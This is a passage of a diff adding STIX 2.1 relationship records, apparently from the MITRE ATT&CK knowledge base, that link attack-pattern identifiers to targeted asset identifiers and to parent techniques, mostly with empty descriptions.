"x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4396f3d3-ae0d-47c2-82a4-edc49946b7a0", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--43ae3570-ecfb-427d-9914-2338bdf63e0e", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--43ce1828-5b95-4f88-840b-52633ec5db19", + "created": "2024-05-23T04:08:59.218Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:40:15.354Z", + "description": "Asset Mapping Rationale: Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.", + "relationship_type": "targets", + "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--43e0b7d2-9017-4e77-8c6a-2cd11ad8870f", + "created": "2024-06-24T18:58:47.347Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-24T18:58:47.347Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--43f93310-42d6-4ee5-9658-08f9d61554e7", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--441dcd21-ae58-4065-a456-fb0519c983e2", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4425afe3-f3f3-4d60-a708-2ce9e6574db5", + "created": "2024-06-26T15:32:53.081Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:32:53.081Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--442d5214-6070-4c8c-92d1-779d84730847", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--44328a51-7b13-4fb9-8cf2-6086e54d49af", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4436ace7-a47d-4d18-afa1-4454432fba66", + "created": "2020-01-30T14:24:35.602Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--443f8b96-5c1c-48d8-85f3-ea7a7bbadd46", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--446f6001-9c5d-4e9e-90cf-87926682a806", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--446faa78-0012-4895-bfe8-64039ebc2709", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--44b83814-2ff3-41cf-9697-97698405d2ee", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--44bd1108-ec1d-4bcc-b38b-a733729aae5e", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--44c13a3b-9ea5-41b3-99bb-c0666d22e7f5", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--44c359cf-b46f-4d46-ad97-2efebbd401d4", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--44dc1bfb-49e1-4c71-8390-68a19d55d0b9", + "created": "2024-06-27T09:23:17.823Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:23:17.823Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45014b46-6638-4fed-a23d-8e3784ecc89f", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4501e668-75e9-48b5-9b0a-9ee426e7cce9", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4508bdef-9528-47ae-804c-bc59d1e694e7", + "created": "2023-09-28T20:02:35.354Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:02:35.354Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45320c5e-4aae-4e45-9aac-23f863957056", + "created": "2020-03-19T20:22:02.328Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df", + "target_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45339eca-fbf5-467c-a200-214556748a44", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45536ee9-9294-496b-a0ce-83cb5aed91d9", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--456ff399-4925-45d4-aa84-d930eae5348e", + "created": "2023-09-28T20:26:47.786Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:26:47.786Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4585be6e-9aa8-411d-a706-fcede53ab0e1", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--459759ef-27a0-4c8f-888a-afbc832f28b9", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45aae58e-1d09-49de-b4c2-837c6f1d5d8f", + "created": "2023-10-02T20:22:02.539Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:22:02.539Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45ac8255-65b5-4cae-92ce-1e435da5efa1", + "created": "2020-01-24T14:21:52.967Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45b567d7-d637-4f34-ad9b-6bbb5d659b4a", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45d14170-7f7b-4e08-b53f-42fa4a3a04d9", + "created": "2023-09-28T20:15:32.382Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:15:32.382Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45d2ab19-48d0-4af6-87c7-70dc3cd4df80", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--45d6b670-d781-49fe-8688-d403c9033429", + "created": "2022-05-27T14:06:05.236Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-27T14:06:05.236Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--926d8cfd-1d0d-4da2-ab49-3ca10ec3f3b5", + "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--463eea69-aa06-4822-b37c-3ad723d5bb55", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46690df4-ddac-4ed4-8987-8706ae68a0cf", + "created": "2023-09-29T16:42:20.944Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:42:20.944Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46745ced-2499-411d-a30f-9ac55bfa4665", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46759b35-7771-4d8f-9dc8-7b6432de6ce2", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--46798892-d849-43fe-8147-b40cc9da291e", + "created": "2023-09-28T19:42:29.359Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:42:29.359Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": 